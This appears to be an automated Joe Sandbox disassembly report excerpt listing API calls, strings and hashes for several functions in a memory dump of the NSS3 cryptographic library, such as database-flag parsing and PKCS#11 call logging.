certPrefix=, xrefs: 6C6E69B8
nokeydb, xrefs: 6C6E6968
nocertdb, xrefs: 6C6E6951
readOnly, xrefs: 6C6E693D
configdir=, xrefs: 6C6E69A4

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: L_strncasecmpValuefree$FetchFlag$Stripisspace$ParamParameterSkipstrlen
String ID: certPrefix=$configdir=$flags$keyPrefix=$nocertdb$nokeydb$readOnly
API String ID: 2065226673-2785624044
Opcode ID: 6398d139f98814e58d3a1e3f79b8ff9cb6ae88c6b3ec7e4ea177cff7e17db88f
Instruction ID: c2012a65e567fbf6bbcc9181d45de95b6fc716ef6990c5b99afc9b6b3a40847f
Opcode Fuzzy Hash: 6398d139f98814e58d3a1e3f79b8ff9cb6ae88c6b3ec7e4ea177cff7e17db88f
Instruction Fuzzy Hash: 0141C5F1E442096BE700DB79ED89B9B37ACAF1934CF140431EA15E6B02F734DA1887A5

Function 6C6E6CD0 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 298stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C6E6910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C6E6943
Part of subcall function 6C6E6910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C6E6957
Part of subcall function 6C6E6910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C6E6972
Part of subcall function 6C6E6910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C6E6983
Part of subcall function 6C6E6910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C6E69AA
Part of subcall function 6C6E6910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C6E69BE
Part of subcall function 6C6E6910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C6E69D2
Part of subcall function 6C6E6910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C6E69DF
Part of subcall function 6C6E6910: NSSUTIL_ArgStrip.NSS3(?), ref: 6C6E6A5B

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C6E6D8C
free.MOZGLUE(00000000), ref: 6C6E6DC5
free.MOZGLUE(?), ref: 6C6E6DD6
free.MOZGLUE(?), ref: 6C6E6DE7
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C6E6E1F
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C6E6E4B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C6E6E72
free.MOZGLUE(?), ref: 6C6E6EA7
free.MOZGLUE(?), ref: 6C6E6EC4
free.MOZGLUE(?), ref: 6C6E6ED5
free.MOZGLUE(00000000), ref: 6C6E6EE3
free.MOZGLUE(?), ref: 6C6E6EF4
free.MOZGLUE(?), ref: 6C6E6F08
free.MOZGLUE(00000000), ref: 6C6E6F35
free.MOZGLUE(?), ref: 6C6E6F44
free.MOZGLUE(?), ref: 6C6E6F5B
free.MOZGLUE(00000000), ref: 6C6E6F65

Part of subcall function 6C6E6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C6E781D,00000000,6C6DBE2C,?,6C6E6B1D,?,?,?,?,00000000,00000000,6C6E781D), ref: 6C6E6C40
Part of subcall function 6C6E6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C6E781D,?,6C6DBE2C,?), ref: 6C6E6C58
Part of subcall function 6C6E6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C6E781D), ref: 6C6E6C6F
Part of subcall function 6C6E6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C6E6C84
Part of subcall function 6C6E6C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C6E6C96
Part of subcall function 6C6E6C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C6E6CAA

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C6E6F90
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C6E6FC5
PK11_GetInternalKeySlot.NSS3 ref: 6C6E6FF4

Strings

+`ol, xrefs: 6C6E6D0D

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
String ID: +`ol
API String ID: 1304971872-3099682328
Opcode ID: 08020b8afdbae1c293281565f94e0a6320e39ae6ee3130e25277d16e2cebcee4
Instruction ID: 6f041d2fbb0e683be71750a11e956946a47d2fd0b4e472c39e981ee335195bca
Opcode Fuzzy Hash: 08020b8afdbae1c293281565f94e0a6320e39ae6ee3130e25277d16e2cebcee4
Instruction Fuzzy Hash: A6B161B0E0A20D9FDF10CFA5D884B9E7BB9BF09349F140026EA15E7A40E731E915CB65

Function 6C6DAF20 Relevance: 35.1, APIs: 10, Strings: 10, Instructions: 126COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_SignMessage), ref: 6C6DAF46
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C6DAF74
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6DAF83

Part of subcall function 6C7BD930: PL_strncpyz.NSS3(?,?,?), ref: 6C7BD963

PR_LogPrint.NSS3(?,00000000), ref: 6C6DAF99
PR_LogPrint.NSS3( pParameter = 0x%p,?), ref: 6C6DAFBE
PR_LogPrint.NSS3( ulParameterLen = 0x%p,?), ref: 6C6DAFD9
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C6DAFF4
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C6DB00F
PR_LogPrint.NSS3( pSignature = 0x%p,?), ref: 6C6DB028
PR_LogPrint.NSS3( pulSignatureLen = 0x%p,?), ref: 6C6DB041

Strings

n{l, xrefs: 6C6DB059, 6C6DB093
C_SignMessage, xrefs: 6C6DAF41
pData = 0x%p, xrefs: 6C6DAFEF
pSignature = 0x%p, xrefs: 6C6DB023
hSession = 0x%x, xrefs: 6C6DAF5E, 6C6DAF6E
ulParameterLen = 0x%p, xrefs: 6C6DAFD4
pulSignatureLen = 0x%p, xrefs: 6C6DB03C
(CK_INVALID_HANDLE), xrefs: 6C6DAF7C
ulDataLen = %d, xrefs: 6C6DB00A
pParameter = 0x%p, xrefs: 6C6DAFB9

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pData = 0x%p$ pParameter = 0x%p$ pSignature = 0x%p$ pulSignatureLen = 0x%p$ ulDataLen = %d$ ulParameterLen = 0x%p$ (CK_INVALID_HANDLE)$C_SignMessage$n{l
API String ID: 1003633598-3891368297
Opcode ID: c1ca8a43a1bab50974a45f2a3370c64760cd0a413e1f96617278a4aeb56979c9
Instruction ID: bfa77281993a43b70d6af4a6633ee9d0b9b909951696ffd85a529b6ef2f3f2e4
Opcode Fuzzy Hash: c1ca8a43a1bab50974a45f2a3370c64760cd0a413e1f96617278a4aeb56979c9
Instruction Fuzzy Hash: CB41B275701145AFDB108F54DE4CE8A3BB2AF8631DF494078F90867A12DB34E958CBEA

Function 6C6D08F0 Relevance: 33.5, APIs: 13, Strings: 6, Instructions: 230COMMON

Download Yara Rule

APIs

htonl.WSOCK32(-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 6C6D094D
htonl.WSOCK32(-00000001,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6D0953
htonl.WSOCK32(-00000001,-00000001,-00000001), ref: 6C6D096E
htonl.WSOCK32(-00000001,-00000001,-00000001,-00000001), ref: 6C6D0974
htonl.WSOCK32(-00000001,-00000001,-00000001,-00000001,-00000001), ref: 6C6D098F
htonl.WSOCK32(-00000001,-00000001,-00000001,-00000001,-00000001,-00000001), ref: 6C6D0995

Part of subcall function 6C6D1800: SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C6D1860
Part of subcall function 6C6D1800: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00000000,?,-00000001,?,6C6D09BF), ref: 6C6D1897
Part of subcall function 6C6D1800: memcpy.VCRUNTIME140(?,-00000001,-00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C6D18AA
Part of subcall function 6C6D1800: memcpy.VCRUNTIME140(?,?,?), ref: 6C6D18C4

PK11_FreeSymKey.NSS3(00000000,?,?,?,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 6C6D0B4F
SECITEM_ZfreeItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 6C6D0B5E
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 6C6D0B6B
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,-00000001,-00000001), ref: 6C6D0B78

Strings

psk_id_hash, xrefs: 6C6D09B5
info_hash, xrefs: 6C6D09E0
secret, xrefs: 6C6D0A88
key, xrefs: 6C6D0ACB
base_nonce, xrefs: 6C6D0B06
exp, xrefs: 6C6D0B36

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: htonl$Item_Util$Zfreememcpy$AllocFreeK11_
String ID: base_nonce$exp$info_hash$key$psk_id_hash$secret
API String ID: 1637529542-763765719
Opcode ID: bf9b2b7f8b51ab32440dcd19cf22b8f977f107fa7878ffe7e0ae2defc641be0e
Instruction ID: 8102cd47f76b071f9c0b89c1bef20e4fb19369e376af880bbc8294416ae827a9
Opcode Fuzzy Hash: bf9b2b7f8b51ab32440dcd19cf22b8f977f107fa7878ffe7e0ae2defc641be0e
Instruction Fuzzy Hash: E8819AB5608305AFC700CF64C98099AF7E9EF8C308F058959FA9897751E731EA19CB96

Function 6C6E2D80 Relevance: 33.4, APIs: 22, Instructions: 381COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6C6E2DEC
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6C6E2E00
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C6E2E2B
PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C6E2E43
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6C6B4F1C,?,-00000001,00000000,?), ref: 6C6E2E74
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6C6B4F1C,?,-00000001,00000000), ref: 6C6E2E88
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C6E2EC6
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C6E2EE4
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C6E2EF8
PR_Unlock.NSS3(?), ref: 6C6E2F62
TlsGetValue.KERNEL32 ref: 6C6E2F86
EnterCriticalSection.KERNEL32(0000001C), ref: 6C6E2F9E
PR_Unlock.NSS3(?), ref: 6C6E2FCA
TlsGetValue.KERNEL32 ref: 6C6E301A
EnterCriticalSection.KERNEL32(?), ref: 6C6E302E
PR_Unlock.NSS3(?), ref: 6C6E3066
PR_SetError.NSS3(00000000,00000000), ref: 6C6E3085
PR_Unlock.NSS3(?), ref: 6C6E30EC
TlsGetValue.KERNEL32 ref: 6C6E310C
EnterCriticalSection.KERNEL32(0000001C), ref: 6C6E3124
PR_Unlock.NSS3(?), ref: 6C6E314C

Part of subcall function 6C6C9180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6C6F379E,?,6C6C9568,00000000,?,6C6F379E,?,00000001,?), ref: 6C6C918D
Part of subcall function 6C6C9180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6C6F379E,?,6C6C9568,00000000,?,6C6F379E,?,00000001,?), ref: 6C6C91A0

Part of subcall function 6C6907A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C62204A), ref: 6C6907AD
Part of subcall function 6C6907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C62204A), ref: 6C6907CD
Part of subcall function 6C6907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C62204A), ref: 6C6907D6
Part of subcall function 6C6907A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C62204A), ref: 6C6907E4
Part of subcall function 6C6907A0: TlsSetValue.KERNEL32(00000000,?,6C62204A), ref: 6C690864
Part of subcall function 6C6907A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C690880
Part of subcall function 6C6907A0: TlsSetValue.KERNEL32(00000000,?,?,6C62204A), ref: 6C6908CB
Part of subcall function 6C6907A0: TlsGetValue.KERNEL32(?,?,6C62204A), ref: 6C6908D7
Part of subcall function 6C6907A0: TlsGetValue.KERNEL32(?,?,6C62204A), ref: 6C6908FB

PR_SetError.NSS3(00000000,00000000), ref: 6C6E316D

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
String ID:
API String ID: 3383223490-0
Opcode ID: fe203aebe77d20c408b2b959aea5dca94efa18ca9d2493a2a36434b45b65b8b6
Instruction ID: 5786d9fcf2ff3fa34dac7f1f3dbef505070aa08ab6919b22009f7e59ee6c2ad4
Opcode Fuzzy Hash: fe203aebe77d20c408b2b959aea5dca94efa18ca9d2493a2a36434b45b65b8b6
Instruction Fuzzy Hash: E5F1CCB5E052099FDF00DF68D888B9ABBB5FF09318F14416AEC04A7721E731E895CB85

Function 6C6D8820 Relevance: 31.6, APIs: 9, Strings: 9, Instructions: 119COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DecryptVerifyUpdate), ref: 6C6D8846
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C6D8874
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6D8883

Part of subcall function 6C7BD930: PL_strncpyz.NSS3(?,?,?), ref: 6C7BD963

PR_LogPrint.NSS3(?,00000000), ref: 6C6D8899
PR_LogPrint.NSS3( pEncryptedPart = 0x%p,?), ref: 6C6D88BA
PR_LogPrint.NSS3( ulEncryptedPartLen = %d,?), ref: 6C6D88D3
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6C6D88EC
PR_LogPrint.NSS3( pulPartLen = 0x%p,?), ref: 6C6D8907
PR_LogPrint.NSS3( *pulPartLen = 0x%x,?), ref: 6C6D8979

Strings

ulEncryptedPartLen = %d, xrefs: 6C6D88CE
*pulPartLen = 0x%x, xrefs: 6C6D8974
n{l, xrefs: 6C6D8921, 6C6D8955
C_DecryptVerifyUpdate, xrefs: 6C6D8841
pEncryptedPart = 0x%p, xrefs: 6C6D88B5
hSession = 0x%x, xrefs: 6C6D885E, 6C6D886E
pPart = 0x%p, xrefs: 6C6D88E7
pulPartLen = 0x%p, xrefs: 6C6D8902
(CK_INVALID_HANDLE), xrefs: 6C6D887C

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulPartLen = 0x%x$ hSession = 0x%x$ pEncryptedPart = 0x%p$ pPart = 0x%p$ pulPartLen = 0x%p$ ulEncryptedPartLen = %d$ (CK_INVALID_HANDLE)$C_DecryptVerifyUpdate$n{l
API String ID: 1003633598-3519157334
Opcode ID: 611e354ee749e3cc0866ae873654b6bef713d17dcb7abd3a03da51fafef5d157
Instruction ID: d6e14097fb6b42273ffcb46e1dd9ba4b9edebb3a3c9ddcb97f0a7082bd2a6240
Opcode Fuzzy Hash: 611e354ee749e3cc0866ae873654b6bef713d17dcb7abd3a03da51fafef5d157
Instruction Fuzzy Hash: 4841A175701145AFDB108F54DE4CA8A3BB1AB4631DF455029E8086B622D734F958CBD6

Function 6C6D6D60 Relevance: 31.6, APIs: 9, Strings: 9, Instructions: 119COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_Digest), ref: 6C6D6D86
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C6D6DB4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6D6DC3

Part of subcall function 6C7BD930: PL_strncpyz.NSS3(?,?,?), ref: 6C7BD963

PR_LogPrint.NSS3(?,00000000), ref: 6C6D6DD9
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C6D6DFA
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C6D6E13
PR_LogPrint.NSS3( pDigest = 0x%p,?), ref: 6C6D6E2C
PR_LogPrint.NSS3( pulDigestLen = 0x%p,?), ref: 6C6D6E47
PR_LogPrint.NSS3( *pulDigestLen = 0x%x,?), ref: 6C6D6EB9

Strings

n{l, xrefs: 6C6D6E61, 6C6D6E95
*pulDigestLen = 0x%x, xrefs: 6C6D6EB4
pulDigestLen = 0x%p, xrefs: 6C6D6E42
pData = 0x%p, xrefs: 6C6D6DF5
hSession = 0x%x, xrefs: 6C6D6D9E, 6C6D6DAE
C_Digest, xrefs: 6C6D6D81
(CK_INVALID_HANDLE), xrefs: 6C6D6DBC
pDigest = 0x%p, xrefs: 6C6D6E27
ulDataLen = %d, xrefs: 6C6D6E0E

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulDigestLen = 0x%x$ hSession = 0x%x$ pData = 0x%p$ pDigest = 0x%p$ pulDigestLen = 0x%p$ ulDataLen = %d$ (CK_INVALID_HANDLE)$C_Digest$n{l
API String ID: 1003633598-4200551970
Opcode ID: da6413c82ee5d8c1df80784e7c19b5f4e1f357b3da47bf179978369c3558631f
Instruction ID: cb045300d1b59416db15778dd62787d9154336492665e99c868445f0dd70499a
Opcode Fuzzy Hash: da6413c82ee5d8c1df80784e7c19b5f4e1f357b3da47bf179978369c3558631f
Instruction Fuzzy Hash: BC41C17570110AAFDB109F54DE4CB8A7BB1AF8631DF054428F808A7A12DB34F919CBDA

Function 6C6D6960 Relevance: 31.6, APIs: 9, Strings: 9, Instructions: 119COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DecryptUpdate), ref: 6C6D6986
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C6D69B4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6D69C3

Part of subcall function 6C7BD930: PL_strncpyz.NSS3(?,?,?), ref: 6C7BD963

PR_LogPrint.NSS3(?,00000000), ref: 6C6D69D9
PR_LogPrint.NSS3( pEncryptedPart = 0x%p,?), ref: 6C6D69FA
PR_LogPrint.NSS3( ulEncryptedPartLen = %d,?), ref: 6C6D6A13
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6C6D6A2C
PR_LogPrint.NSS3( pulPartLen = 0x%p,?), ref: 6C6D6A47
PR_LogPrint.NSS3( *pulPartLen = 0x%x,?), ref: 6C6D6AB9

Strings

ulEncryptedPartLen = %d, xrefs: 6C6D6A0E
*pulPartLen = 0x%x, xrefs: 6C6D6AB4
n{l, xrefs: 6C6D6A61, 6C6D6A95
pEncryptedPart = 0x%p, xrefs: 6C6D69F5
C_DecryptUpdate, xrefs: 6C6D6981
hSession = 0x%x, xrefs: 6C6D699E, 6C6D69AE
pPart = 0x%p, xrefs: 6C6D6A27
pulPartLen = 0x%p, xrefs: 6C6D6A42
(CK_INVALID_HANDLE), xrefs: 6C6D69BC

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulPartLen = 0x%x$ hSession = 0x%x$ pEncryptedPart = 0x%p$ pPart = 0x%p$ pulPartLen = 0x%p$ ulEncryptedPartLen = %d$ (CK_INVALID_HANDLE)$C_DecryptUpdate$n{l
API String ID: 1003633598-2688821030
Opcode ID: 3347f108a9cdb777b8da82da6f7801e9034fcf871f3579a4d85e143d2f8905ce
Instruction ID: d44d2e001c8fd986bf201290884e6364aca730f4162cc6c8ac600c23d3f9ba91
Opcode Fuzzy Hash: 3347f108a9cdb777b8da82da6f7801e9034fcf871f3579a4d85e143d2f8905ce
Instruction Fuzzy Hash: E841D371701006AFDB108F54DE4CA8A3BB1AB4631DF098478F808AB612DB34F918CBE6

Function 6C6E4C20 Relevance: 30.3, APIs: 20, Instructions: 290memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C6E4C4C
EnterCriticalSection.KERNEL32(?), ref: 6C6E4C60
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C6E4CA1
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C6E4CBE
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C6E4CD2
realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6E4D3A
PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6E4D4F
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C6E4DB7

Part of subcall function 6C74DD70: TlsGetValue.KERNEL32 ref: 6C74DD8C
Part of subcall function 6C74DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C74DDB4

Part of subcall function 6C6907A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C62204A), ref: 6C6907AD
Part of subcall function 6C6907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C62204A), ref: 6C6907CD
Part of subcall function 6C6907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C62204A), ref: 6C6907D6
Part of subcall function 6C6907A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C62204A), ref: 6C6907E4
Part of subcall function 6C6907A0: TlsSetValue.KERNEL32(00000000,?,6C62204A), ref: 6C690864
Part of subcall function 6C6907A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C690880
Part of subcall function 6C6907A0: TlsSetValue.KERNEL32(00000000,?,?,6C62204A), ref: 6C6908CB
Part of subcall function 6C6907A0: TlsGetValue.KERNEL32(?,?,6C62204A), ref: 6C6908D7
Part of subcall function 6C6907A0: TlsGetValue.KERNEL32(?,?,6C62204A), ref: 6C6908FB

TlsGetValue.KERNEL32 ref: 6C6E4DD7
EnterCriticalSection.KERNEL32(?), ref: 6C6E4DEC
PR_Unlock.NSS3(?), ref: 6C6E4E1B
PR_SetError.NSS3(00000000,00000000), ref: 6C6E4E2F
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6E4E5A
PR_SetError.NSS3(00000000,00000000), ref: 6C6E4E71
free.MOZGLUE(00000000), ref: 6C6E4E7A
PR_Unlock.NSS3(?), ref: 6C6E4EA2
TlsGetValue.KERNEL32 ref: 6C6E4EC1
EnterCriticalSection.KERNEL32(?), ref: 6C6E4ED6
